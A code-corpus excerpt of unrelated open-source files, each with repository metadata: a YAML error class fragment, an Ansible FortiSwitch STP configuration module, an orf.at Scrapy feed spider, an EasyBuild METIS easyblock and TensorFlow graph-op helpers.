                 or self.context_mark.name != self.problem_mark.name
                 or self.context_mark.line != self.problem_mark.line
                 or self.context_mark.column != self.problem_mark.column))
        if show_context_mark:
            parts.append(str(self.context_mark))
        if self.problem is not None:
            parts.append(self.problem)
        if self.problem_mark is not None:
            parts.append(str(self.problem_mark))
        if self.note is not None:
            parts.append(self.note)
        return '\n'.join(parts)
|
naparuba/opsbro
|
opsbro/misc/internalyaml/ruamel/yaml/error.py
|
Python
|
mit
| 2,752
|
#!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
# Ensure new-style classes under Python 2.
__metaclass__ = type
# Ansible metadata describing the module's support status.
ANSIBLE_METADATA = {'status': ['preview'],
                    'supported_by': 'community',
                    'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_switch_controller_stp_settings
short_description: Configure FortiSwitch spanning tree protocol (STP) in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify switch_controller feature and stp_settings category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.9"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
switch_controller_stp_settings:
description:
- Configure FortiSwitch spanning tree protocol (STP).
default: null
type: dict
suboptions:
forward_time:
description:
- Period of time a port is in listening and learning state (4 - 30 sec).
type: int
hello_time:
description:
- Period of time between successive STP frame Bridge Protocol Data Units (BPDUs) sent on a port (1 - 10 sec).
type: int
max_age:
description:
- Maximum time before a bridge port saves its configuration BPDU information (6 - 40 sec).
type: int
max_hops:
description:
- Maximum number of hops between the root bridge and the furthest bridge (1- 40).
type: int
name:
description:
- Name of global STP settings configuration.
type: str
pending_timer:
description:
- Pending time (1 - 15 sec).
type: int
revision:
description:
- STP revision number (0 - 65535).
type: int
status:
description:
- Enable/disable STP.
type: str
choices:
- enable
- disable
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure FortiSwitch spanning tree protocol (STP).
fortios_switch_controller_stp_settings:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
switch_controller_stp_settings:
forward_time: "3"
hello_time: "4"
max_age: "5"
max_hops: "6"
name: "default_name_7"
pending_timer: "8"
revision: "9"
status: "enable"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
    """Open a legacy fortiosapi session using the credentials in `data`.

    Enables debug output, selects HTTP/HTTPS transport (HTTPS unless
    explicitly disabled) and logs in, honouring `ssl_verify`.
    """
    host = data['host']
    username = data['username']
    password = data['password']
    ssl_verify = data['ssl_verify']
    fos.debug('on')
    # HTTPS stays on unless the task arguments explicitly turn it off.
    use_https = data.get('https', True)
    if use_https:
        fos.https('on')
    else:
        fos.https('off')
    fos.login(host, username, password, verify=ssl_verify)
def filter_switch_controller_stp_settings_data(json):
    """Return a copy of `json` restricted to the known STP settings keys.

    Keys that are absent or whose value is None are dropped, so only
    explicitly provided options are sent to the device.
    """
    option_list = ['forward_time', 'hello_time', 'max_age',
                   'max_hops', 'name', 'pending_timer',
                   'revision', 'status']
    return {key: json[key]
            for key in option_list
            if key in json and json[key] is not None}
def underscore_to_hyphen(data):
    """Recursively rename dict keys from ``foo_bar`` to ``foo-bar``.

    FortiOS expects hyphenated attribute names while Ansible arguments
    use underscores.  Handles nested dicts and lists; any other value is
    returned unchanged.
    """
    if isinstance(data, list):
        # Bug fix: the previous code rebound the loop variable
        # (``elem = underscore_to_hyphen(elem)``), which discarded the
        # converted value and left list contents untouched.  Build a new
        # list from the converted elements instead.
        return [underscore_to_hyphen(elem) for elem in data]
    if isinstance(data, dict):
        return {k.replace('_', '-'): underscore_to_hyphen(v)
                for k, v in data.items()}
    return data
def switch_controller_stp_settings(data, fos):
    """Push the stp-settings configuration in `data` to the device.

    Filters out unset options, converts key names to FortiOS hyphenated
    form and issues the API call via `fos`.
    """
    vdom = data['vdom']
    raw_settings = data['switch_controller_stp_settings']
    payload = underscore_to_hyphen(
        filter_switch_controller_stp_settings_data(raw_settings))
    return fos.set('switch-controller',
                   'stp-settings',
                   data=payload,
                   vdom=vdom)
def is_successful_status(status):
    """Return True when the API reply indicates success.

    A DELETE answered with HTTP 404 also counts as success: the object
    is already gone.
    """
    if status['status'] == "success":
        return True
    return status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_switch_controller(data, fos):
    # Dispatch the switch_controller feature call and normalise the reply
    # into (is_error, has_changed, result).
    if data['switch_controller_stp_settings']:
        resp = switch_controller_stp_settings(data, fos)
    # NOTE(review): if 'switch_controller_stp_settings' is missing or
    # empty, `resp` is never bound and the return below raises NameError
    # -- confirm callers always supply it (main() declares it optional).
    return not is_successful_status(resp), \
        resp['status'] == "success", \
        resp
def main():
    # Entry point: declare the module arguments, choose between the
    # HTTPAPI connection and the legacy fortiosapi transport, run the
    # configuration call and report the outcome to Ansible.
    fields = {
        "host": {"required": False, "type": "str"},
        "username": {"required": False, "type": "str"},
        "password": {"required": False, "type": "str", "default": "", "no_log": True},
        "vdom": {"required": False, "type": "str", "default": "root"},
        "https": {"required": False, "type": "bool", "default": True},
        "ssl_verify": {"required": False, "type": "bool", "default": True},
        "switch_controller_stp_settings": {
            "required": False, "type": "dict", "default": None,
            "options": {
                "forward_time": {"required": False, "type": "int"},
                "hello_time": {"required": False, "type": "int"},
                "max_age": {"required": False, "type": "int"},
                "max_hops": {"required": False, "type": "int"},
                "name": {"required": False, "type": "str"},
                "pending_timer": {"required": False, "type": "int"},
                "revision": {"required": False, "type": "int"},
                "status": {"required": False, "type": "str",
                           "choices": ["enable", "disable"]}
            }
        }
    }
    module = AnsibleModule(argument_spec=fields,
                           supports_check_mode=False)
    # legacy_mode refers to using fortiosapi instead of HTTPAPI
    legacy_mode = 'host' in module.params and module.params['host'] is not None and \
                  'username' in module.params and module.params['username'] is not None and \
                  'password' in module.params and module.params['password'] is not None
    if not legacy_mode:
        # HTTPAPI transport: reuse the persistent connection socket.
        if module._socket_path:
            connection = Connection(module._socket_path)
            fos = FortiOSHandler(connection)
            is_error, has_changed, result = fortios_switch_controller(module.params, fos)
        else:
            module.fail_json(**FAIL_SOCKET_MSG)
    else:
        # Legacy transport: import fortiosapi on demand and log in.
        try:
            from fortiosapi import FortiOSAPI
        except ImportError:
            module.fail_json(msg="fortiosapi module is required")
        fos = FortiOSAPI()
        login(module.params, fos)
        is_error, has_changed, result = fortios_switch_controller(module.params, fos)
        fos.logout()
    if not is_error:
        module.exit_json(changed=has_changed, meta=result)
    else:
        module.fail_json(msg="Error in repo", meta=result)
# Standard script entry point.
if __name__ == '__main__':
    main()
|
thaim/ansible
|
lib/ansible/modules/network/fortios/fortios_switch_controller_stp_settings.py
|
Python
|
mit
| 10,652
|
__all__ = ["read"]
|
khachik/ghugh
|
data/__init__.py
|
Python
|
bsd-2-clause
| 19
|
import json
import re
from urllib.parse import urlparse
import lxml
import scrapy
from inline_requests import inline_requests
from scrapy.selector import Selector
from feeds.loaders import FeedEntryItemLoader
from feeds.spiders import FeedsXMLFeedSpider
from feeds.utils import generate_feed_header
class OrfAtSpider(FeedsXMLFeedSpider):
name = "orf.at"
namespaces = [
("dc", "http://purl.org/dc/elements/1.1/"),
("orfon", "http://rss.orf.at/1.0/"),
("rdf", "http://www.w3.org/1999/02/22-rdf-syntax-ns#"),
# Default (empty) namespaces are not supported so we just come up with one.
("rss", "http://purl.org/rss/1.0/"),
]
itertag = "rss:item"
# Use XML iterator instead of regex magic which would fail due to the
# introduced rss namespace prefix.
iterator = "xml"
    def start_requests(self):
        # Read the configured channel list (whitespace separated);
        # default to just the "news" channel.
        channels = self.settings.get("FEEDS_SPIDER_ORF_AT_CHANNELS")
        if channels:
            channels = set(channels.split())
        else:
            channels = {"news"}
        available_channels = {
            "burgenland",
            "fm4",
            "help",
            "kaernten",
            "news",
            "noe",
            "oe3",
            "oesterreich",
            "ooe",
            "religion",
            "salzburg",
            "science",
            "sport",
            "steiermark",
            "tirol",
            "vorarlberg",
            "wien",
        }
        # Warn about (but do not drop) channels we don't recognise.
        unknown_channels = channels - available_channels
        if unknown_channels:
            self.logger.warning(
                "Unknown channel(s) in config file: {}".format(
                    ", ".join(unknown_channels)
                )
            )
        for channel in channels:
            yield scrapy.Request(
                "https://rss.orf.at/{}.xml".format(channel),
                meta={"path": channel, "dont_cache": True},
            )
        self._channels = channels
        # Optional per-author feeds, one author per config line.
        self._authors = [
            author
            for author in (
                self.settings.get("FEEDS_SPIDER_ORF_AT_AUTHORS", "").split("\n")
            )
            if author
        ]
def feed_headers(self):
for channel in self._channels:
channel_url = "{}.ORF.at".format(channel)
yield generate_feed_header(
title=channel_url,
link="https://{}".format(channel_url.lower()),
path=channel,
logo=self._get_logo(channel),
)
for author in self._authors:
yield generate_feed_header(title="ORF.at: {}".format(author), path=author)
def parse(self, response):
selector = Selector(response, type="xml")
doc = lxml.etree.ElementTree(lxml.etree.fromstring(response.body))
if doc.getroot().nsmap:
self._register_namespaces(selector)
nodes = selector.xpath("//%s" % self.itertag)
else:
nodes = selector.xpath("//item")
return self.parse_nodes(response, nodes)
def parse_node(self, response, node):
if "orfon" in node.namespaces:
return self._parse_extended_node(response, node)
else:
return self._parse_simple_node(response, node)
def _parse_extended_node(self, response, node):
categories = [
node.xpath("orfon:storyType/@rdf:resource").re_first("urn:orfon:type:(.*)"),
node.xpath("dc:subject/text()").extract_first(),
]
substories = node.xpath(
"orfon:substories/rdf:Bag/rdf:li/@rdf:resource"
).extract()
updated = node.xpath("dc:date/text()").extract_first()
meta = {
"path": response.meta["path"],
"categories": categories,
"updated": updated,
}
if substories:
links = substories
else:
links = [node.xpath("rss:link/text()").extract_first()]
for link in links:
fixed_link = self._extract_link(link)
if fixed_link is None or any(
fixed_link.startswith(url)
for url in ["https://debatte.orf.at", "https://iptv.orf.at"]
):
self.logger.debug(
"Ignoring link to '{}' ('{}')".format(link, fixed_link)
)
else:
yield scrapy.Request(fixed_link, self._parse_article, meta=meta)
def _parse_simple_node(self, response, node):
meta = {
"path": response.meta["path"],
"categories": node.xpath("category/text()").extract(),
"updated": node.xpath("pubDate/text()").extract_first(),
}
link = node.xpath("link/text()").extract_first()
return scrapy.Request(link, self._parse_article, meta=meta)
@staticmethod
def _extract_link(link):
"""Extract a working link from a possibly broken link."""
if link is None:
return None
match = re.search(r"https?://(?:[^\.]+\.)?orf\.at/(?:news/)?stories/\d*", link)
return match.group(0) + "/" if match else None
@inline_requests
def _parse_article(self, response):
# Heuristic for news.ORF.at to to detect teaser articles.
more = self._extract_link(
response.css(
".story-story p > strong:contains('Mehr') + a::attr(href), "
+ ".story-story p > a:contains('Lesen Sie mehr')::attr(href)"
).extract_first()
)
if more and more != response.url:
self.logger.debug("Detected teaser article, redirecting to {}".format(more))
response = yield scrapy.Request(more, meta=response.meta)
remove_elems = [
".byline",
"h1",
".socialshare",
".socialShareWrapper",
".socialButtons",
".credit",
".toplink",
".offscreen",
".storyMeta",
"script",
".oon-youtube-logo",
".vote",
# redesign
"#more-to-read-anchor",
".social-buttons",
".story-horizontal-ad",
".linkcard",
".geolocation", # Bundesländer
]
pullup_elems = {
".remote .slideshow": 1,
".remote .instagram": 1,
".remote .facebook": 1,
".remote .twitter": 1,
".remote .youtube": 1,
".remote table": 1,
}
replace_elems = {
".video": "<p><em>Hinweis: Das eingebettete Video ist nur im Artikel "
+ "verfügbar.</em></p>",
".slideshow": (
"<p><em>Alte Slideshows werden nicht mehr unterstützt.</em></p>"
),
}
change_attribs = {"img": {"data-src": "src", "srcset": "src"}}
change_tags = {
".image": "figure",
".caption": "figcaption",
".fact": "blockquote", # FM4
}
author, author_selector = self._extract_author(response)
if author:
self.logger.debug("Extracted possible author '{}'".format(author))
# Remove the paragraph that contains the author.
remove_elems.insert(0, author_selector)
else:
self.logger.debug("Could not extract author name")
author = "{}.ORF.at".format(response.meta["path"])
for slideshow in response.css(".slideshow"):
link = response.urljoin(
slideshow.css('::attr("data-slideshow-json-href")').extract_first()
).replace("jsonp", "json")
slideshow_id = slideshow.css('::attr("id")').extract_first()
slideshow_response = yield scrapy.Request(link)
replace_elems["#{}".format(slideshow_id)] = self._create_slideshow_html(
slideshow_response
)
il = FeedEntryItemLoader(
response=response,
remove_elems=remove_elems,
pullup_elems=pullup_elems,
replace_elems=replace_elems,
change_attribs=change_attribs,
change_tags=change_tags,
)
# The field is part of a JSON that is sometimes not valid, so don't bother with
# parsing it properly.
match = re.search(r'"datePublished": "([^"]+)"', response.text)
if match:
# news.ORF.at
updated = match.group(1)
else:
# other
updated = response.meta["updated"]
il.add_value("updated", updated)
il.add_css("title", ".story-lead-headline ::text") # news
il.add_css("title", "#ss-storyText > h1 ::text") # FM4, science
il.add_value("link", response.url)
il.add_css("content_html", ".opener img") # FM4, news
il.add_css("content_html", ".story-lead-text") # news
il.add_css("content_html", "#ss-storyText")
il.add_css("content_html", "#ss-storyContent") # news
il.add_value("author_name", author)
if author in self._authors:
il.add_value("path", author)
il.add_value("path", response.meta["path"])
il.add_value("category", response.meta["categories"])
yield il.load_item()
@staticmethod
def _create_slideshow_html(response):
slideshow = json.loads(response.text)
figures = []
for photo in slideshow["photos"]:
url = photo["url"]
caption = photo.get("description") or ""
figures.append(
(
'<figure><div><img src="{url}"></div>'
+ "<figcaption>{caption}</figcaption></figure>"
).format(url=url, caption=caption)
)
return "<div>" + "".join(figures) + "</div>"
@staticmethod
def _extract_author(response):
domain = urlparse(response.url).netloc
if domain == "fm4.orf.at":
author = (
response.css("#ss-storyText > .socialButtons")
.xpath(
"following-sibling::p[("
+ "starts-with(., 'Von') or starts-with(., 'von') "
+ "or starts-with(., 'By') or starts-with(., 'by')"
+ ") and position() = 1]/a/text()"
)
.extract_first()
)
author_selector = "#ss-storyText > .socialButtons + p"
if author:
return (author.strip(), author_selector)
elif domain in ["science.orf.at", "help.orf.at", "religion.orf.at"]:
try:
author = (
response.css("#ss-storyText > p:not(.date):not(.toplink)::text")
.extract()[-1]
.strip()
)
# Possible author string must be in [2, 50].
if 2 <= len(author) <= 50:
# Only take the author name before ",".
author = re.split(r"[/,]", author)[0]
return (
author.strip(),
(
"#ss-storyText > p:not(.date):not(.toplink):"
+ "contains('{}')"
).format(author),
)
except IndexError:
pass
else:
author = response.css(".byline ::text").extract_first()
if author:
return (re.split(r"[/,]", author)[0].strip(), ".byline")
return (None, None)
@staticmethod
def _get_logo(channel):
images = {
"fm4": ("tube", "fm4"),
"help": ("tube", "help"),
"science": ("tube", "science"),
"news": ("news", "news"),
}
return (
"https://tubestatic.orf.at/mojo/1_3/storyserver/{}/{}/images/"
+ "touch-icon-ipad-retina.png"
).format(*images.get(channel, images.get("news")))
|
nblock/feeds
|
feeds/spiders/orf_at.py
|
Python
|
agpl-3.0
| 11,972
|
##
# Copyright 2009-2015 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for METIS, implemented as an easyblock
@author: Stijn De Weirdt (Ghent University)
@author: Dries Verdegem (Ghent University)
@author: Kenneth Hoste (Ghent University)
@author: Pieter De Baets (Ghent University)
@author: Jens Timmerman (Ghent University)
"""
import os
import shutil
from distutils.version import LooseVersion
from easybuild.easyblocks.generic.configuremake import ConfigureMake
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.filetools import mkdir
from easybuild.tools.run import run_cmd
# NOTE(review): this easyblock uses Python 2-only syntax
# ("except OSError, err", octal literal 0755) and therefore requires a
# Python 2 EasyBuild stack.
class EB_METIS(ConfigureMake):
    """Support for building and installing METIS."""

    def __init__(self, *args, **kwargs):
        """Define custom class variables for METIS."""
        super(EB_METIS, self).__init__(*args, **kwargs)
        # Library extensions ('a' and/or 'so') to verify in the sanity
        # check; populated by configure_step() for METIS >= 5.
        self.lib_exts = []

    def configure_step(self, *args, **kwargs):
        """Configure build using 'make config' (only for recent versions (>= v5))."""
        if LooseVersion(self.version) >= LooseVersion("5"):
            cmd = "make %s config prefix=%s" % (self.cfg['configopts'], self.installdir)
            run_cmd(cmd, log_all=True, simple=True)
            # Record which library type the configure options produce.
            if 'shared=1' in self.cfg['configopts']:
                self.lib_exts.append('so')
            else:
                self.lib_exts.append('a')

    def build_step(self):
        """Add make options before building."""
        # Clear LIBDIR so the build doesn't install into a hardcoded location.
        self.cfg.update('buildopts', 'LIBDIR=""')
        if self.toolchain.options['pic']:
            self.cfg.update('buildopts', 'CC="$CC -fPIC"')
        super(EB_METIS, self).build_step()

    def install_step(self):
        """
        Install by manually copying files to install dir, for old versions,
        or by running 'make install' for new versions.

        Create symlinks where expected by other applications
        (in Lib instead of lib)
        """
        if LooseVersion(self.version) < LooseVersion("5"):
            libdir = os.path.join(self.installdir, 'lib')
            mkdir(libdir)
            includedir = os.path.join(self.installdir, 'include')
            mkdir(includedir)
            # copy libraries
            # NOTE(review): on Python 2, shutil.copy2 raises IOError (not a
            # subclass of OSError) for a missing file, which this handler
            # would not catch — confirm whether (IOError, OSError) was meant.
            try:
                src = os.path.join(self.cfg['start_dir'], 'libmetis.a')
                dst = os.path.join(libdir, 'libmetis.a')
                shutil.copy2(src, dst)
            except OSError, err:
                raise EasyBuildError("Copying file libmetis.a to lib dir failed: %s", err)
            # copy include files
            try:
                for f in ['defs.h', 'macros.h', 'metis.h', 'proto.h', 'rename.h', 'struct.h']:
                    src = os.path.join(self.cfg['start_dir'], 'Lib', f)
                    dst = os.path.join(includedir, f)
                    shutil.copy2(src, dst)
                    # ensure permissions are world-readable/executable
                    os.chmod(dst, 0755)
            except OSError, err:
                raise EasyBuildError("Copying file metis.h to include dir failed: %s", err)
            # other applications depending on ParMETIS (SuiteSparse for one) look for both ParMETIS libraries
            # and header files in the Lib directory (capital L). The following symlinks are hence created.
            try:
                Libdir = os.path.join(self.installdir, 'Lib')
                os.symlink(libdir, Libdir)
                for f in ['defs.h', 'macros.h', 'metis.h', 'proto.h', 'rename.h', 'struct.h']:
                    os.symlink(os.path.join(includedir, f), os.path.join(libdir, f))
            except OSError, err:
                raise EasyBuildError("Something went wrong during symlink creation: %s", err)
        else:
            super(EB_METIS, self).install_step()

    def sanity_check_step(self):
        """Custom sanity check for METIS (more extensive for recent version (>= v5))"""
        binfiles = []
        # NOTE(review): '>' excludes version 5.0 exactly from the binaries
        # check while configure/install treat ">= 5" as "recent" —
        # presumably '>=' was intended here; confirm before changing.
        if LooseVersion(self.version) > LooseVersion("5"):
            binfiles += ["cmpfillin", "gpmetis", "graphchk", "m2gmetis", "mpmetis", "ndmetis"]
        incfiles = ["metis.h"]
        if LooseVersion(self.version) < LooseVersion("5"):
            incfiles += ["defs.h", "macros.h", "proto.h", "rename.h", "struct.h"]
        dirs = []
        if LooseVersion(self.version) < LooseVersion("5"):
            dirs += ["Lib"]
        custom_paths = {
            'files': ['bin/%s' % x for x in binfiles] + ['include/%s' % x for x in incfiles] +
                     ['lib/libmetis.%s' % x for x in self.lib_exts],
            'dirs' : dirs,
        }
        super(EB_METIS, self).sanity_check_step(custom_paths=custom_paths)
|
ULHPC/modules
|
easybuild/easybuild-easyblocks/easybuild/easyblocks/m/metis.py
|
Python
|
mit
| 5,585
|
"""Ops for graph construction.
Large amounts of code borrowed from Keras. Will try to incorporate into
DeepChem properly.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import os
import sys
import traceback
import numpy as np
import tensorflow as tf
from tensorflow.python.training import moving_averages
from collections import defaultdict
# TODO(rbharath): What does this line do?
# Alias the builtin `all` so it remains reachable (Keras convention, in
# case a module-level name ever shadows the builtin).
py_all = all
# TODO(rbharath): REMOVE GLOBAL VARS! BREAKS DEEPCHEM STYLE!
# Per-prefix counters backing get_uid().
_UID_PREFIXES = defaultdict(int)
# This dictionary holds a mapping {graph: learning_phase}.
# A learning phase is a bool tensor used to run Keras models in
# either train mode (learning_phase == 1) or test mode (learning_phase == 0).
_GRAPH_LEARNING_PHASES = {}
def _to_tensor(x, dtype):
  """Convert `x` to a tensor of the requested dtype.

  Parameters
  ----------
  x: tensor-like value accepted by `tf.convert_to_tensor`.
  dtype: Tensorflow dtype to convert to.

  Returns
  -------
  A tensor with dtype `dtype`.
  """
  tensor = tf.convert_to_tensor(x)
  # Only insert a cast op when the dtype actually differs.
  return tensor if tensor.dtype == dtype else tf.cast(tensor, dtype)
def learning_phase():
  """Returns the learning phase flag.

  The learning phase flag is a bool tensor (0 = test, 1 = train)
  to be passed as input to any Keras function
  that uses a different behavior at train time and test time.
  """
  # Lazily create one bool placeholder per graph and cache it in the
  # module-level _GRAPH_LEARNING_PHASES dict.
  graph = tf.get_default_graph()
  if graph not in _GRAPH_LEARNING_PHASES:
    phase = tf.placeholder(dtype='bool', name='keras_learning_phase')
    _GRAPH_LEARNING_PHASES[graph] = phase
  return _GRAPH_LEARNING_PHASES[graph]
def in_train_phase(x, alt):
  """Selects `x` in train phase, and `alt` otherwise.

  Note that `alt` should have the *same shape* as `x`.

  Parameters
  ----------
  x: tensor returned when the learning phase is training (1).
  alt: tensor returned when the learning phase is testing (0).

  Returns
  -------
  Either `x` or `alt` based on `K.learning_phase`.
  """
  phase = learning_phase()
  # Use `==` rather than the original `is 1`/`is 0`: identity comparison
  # against int literals relies on CPython small-int caching and raises a
  # SyntaxWarning on modern Pythons. (A TF1 placeholder tensor compares
  # unequal to both literals, so it still falls through to switch().)
  if phase == 1:
    return x
  elif phase == 0:
    return alt
  # else: assume learning phase is a placeholder tensor.
  x = switch(phase, x, alt)
  x._uses_learning_phase = True
  return x
def switch(condition, then_expression, else_expression):
  """Switches between two operations
  depending on a scalar value (`int` or `bool`).

  Note that both `then_expression` and `else_expression`
  should be symbolic tensors of the *same shape*.

  Parameters
  ----------
  condition: scalar tensor.
  then_expression: either a tensor, or a callable that returns a tensor.
  else_expression: either a tensor, or a callable that returns a tensor.

  Returns
  -------
  The selected tensor.
  """
  if condition.dtype != tf.bool:
    condition = tf.cast(condition, 'bool')

  def _as_callable(expression):
    # tf.cond requires callables; wrap plain tensors lazily.
    if callable(expression):
      return expression
    return lambda: expression

  return tf.cond(condition,
                 _as_callable(then_expression),
                 _as_callable(else_expression))
def normalize_batch_in_training(x, gamma, beta, reduction_axes, epsilon=1e-3):
  """Computes mean and std for batch then apply batch_normalization on batch.

  Parameters
  ----------
  x: input tensor.
  gamma: scale tensor.
  beta: shift tensor.
  reduction_axes: iterable of ints, axes over which to compute the moments.
  epsilon: fuzz factor added to the variance for numerical stability.

  Returns
  -------
  A tuple length of 3, (normalized_tensor, mean, variance).
  """
  mean, var = tf.nn.moments(
      x, reduction_axes, shift=None, name=None, keep_dims=False)
  # Fast path: normalizing over all but the last axis needs no broadcasting.
  # `list(...)` is required — on Python 3 a `range` object never compares
  # equal to a list, so the original comparison was always False; it also
  # called an undefined `ndim` helper (this module defines `get_ndim`).
  if sorted(reduction_axes) == list(range(get_ndim(x)))[:-1]:
    normed = tf.nn.batch_normalization(x, mean, var, beta, gamma, epsilon)
  else:
    # need broadcasting: reshape the moments so they broadcast against x.
    target_shape = []
    for axis in range(get_ndim(x)):
      if axis in reduction_axes:
        target_shape.append(1)
      else:
        target_shape.append(tf.shape(x)[axis])
    # tf.stack — the original called an undefined `stack` helper.
    target_shape = tf.stack(target_shape)
    broadcast_mean = tf.reshape(mean, target_shape)
    broadcast_var = tf.reshape(var, target_shape)
    broadcast_gamma = tf.reshape(gamma, target_shape)
    broadcast_beta = tf.reshape(beta, target_shape)
    normed = tf.nn.batch_normalization(x, broadcast_mean, broadcast_var,
                                       broadcast_beta, broadcast_gamma, epsilon)
  return normed, mean, var
def ones(shape, dtype=None, name=None):
  """Instantiates an all-ones tensor variable and returns it.

  Parameters
  ----------
  shape: Tuple of integers, shape of returned Keras variable.
  dtype: Tensorflow dtype
  name: String, name of returned Keras variable.

  Returns
  -------
  A Keras variable, filled with `1.0`.
  """
  dtype = tf.float32 if dtype is None else dtype
  dims = tuple(int(d) for d in shape)
  init = tf.constant_initializer(1., dtype=dtype)
  return tf.Variable(init(dims), dtype, name)
def cast_to_floatx(x):
  """Cast a Numpy array to the default Keras float type.

  Parameters
  ----------
  x: Numpy array.

  Returns
  -------
  The same Numpy array, cast to its new type.
  """
  # NOTE(review): this passes a tf.DType to numpy; it relies on numpy
  # accepting tf.float32 as a dtype spec — np.float32 would be the
  # unambiguous choice. Confirm before changing.
  return np.asarray(x, dtype=tf.float32)
def moving_average_update(variable, value, momentum):
  """Update `variable` towards `value` with the given momentum (decay).

  Returns the TF op performing the moving-average assignment. The
  TypeError fallback supports older TensorFlow versions whose
  `assign_moving_average` has no `zero_debias` keyword.
  """
  try:
    return moving_averages.assign_moving_average(
        variable, value, momentum, zero_debias=False)
  except TypeError:
    return moving_averages.assign_moving_average(variable, value, momentum)
def int_shape(x):
  """Returns the shape of a Keras tensor or a Keras variable as a tuple of
  integers or None entries.

  Arguments
  ---------
  x: Tensor or variable.

  Returns
  -------
  A tuple of integers (or None entries).
  """
  # `as_list()` maps unknown dimensions to None, matching the documented
  # contract. The original called `__int__()` on every Dimension, which
  # raises on unknown (None) dimensions instead of returning None.
  return tuple(x.get_shape().as_list())
def get_uid(prefix=''):
  """Provides a unique UID given a string prefix.

  Parameters
  ----------
  prefix: string.

  Returns
  -------
  An integer.
  """
  # Counters live in the module-level _UID_PREFIXES defaultdict, so the
  # first call for a prefix returns 1.
  next_uid = _UID_PREFIXES[prefix] + 1
  _UID_PREFIXES[prefix] = next_uid
  return next_uid
def concatenate(tensors, axis=-1):
  """Concatenates a list of tensors alongside the specified axis.

  Parameters
  ----------
  tensors: list of tensors to concatenate.
  axis: int; negative values are normalized against the rank of the
    first tensor (falling back to 0 when the rank is unknown).

  Returns
  -------
  A tensor.
  """
  if axis < 0:
    dims = get_ndim(tensors[0])
    if dims:
      axis = axis % dims
    else:
      axis = 0
  # tf.concat_v2 only existed in some TF 1.0 pre-releases; fall back to
  # tf.concat when it is absent.
  try:
    return tf.concat_v2([x for x in tensors], axis)
  except AttributeError:
    return tf.concat(axis=axis, values=[x for x in tensors])
def _normalize_axis(axis, ndim):
if isinstance(axis, tuple):
axis = list(axis)
if isinstance(axis, list):
for i, a in enumerate(axis):
if a is not None and a < 0:
axis[i] = a % ndim
else:
if axis is not None and axis < 0:
axis = axis % ndim
return axis
def mean(x, axis=None, keepdims=False):
  """Mean of a tensor, alongside the specified axis.

  Parameters
  ----------
  x: A tensor or variable.
  axis: A list of integer. Axes to compute the mean.
  keepdims: A boolean, whether to keep the dimensions or not.
    If keepdims is False, the rank of the tensor is reduced
    by 1 for each entry in axis. If keep_dims is True,
    the reduced dimensions are retained with length 1.

  Returns
  -------
  A tensor with the mean of elements of x.
  """
  reduce_axes = _normalize_axis(axis, get_ndim(x))
  # Booleans cannot be averaged directly; promote them to float32 first.
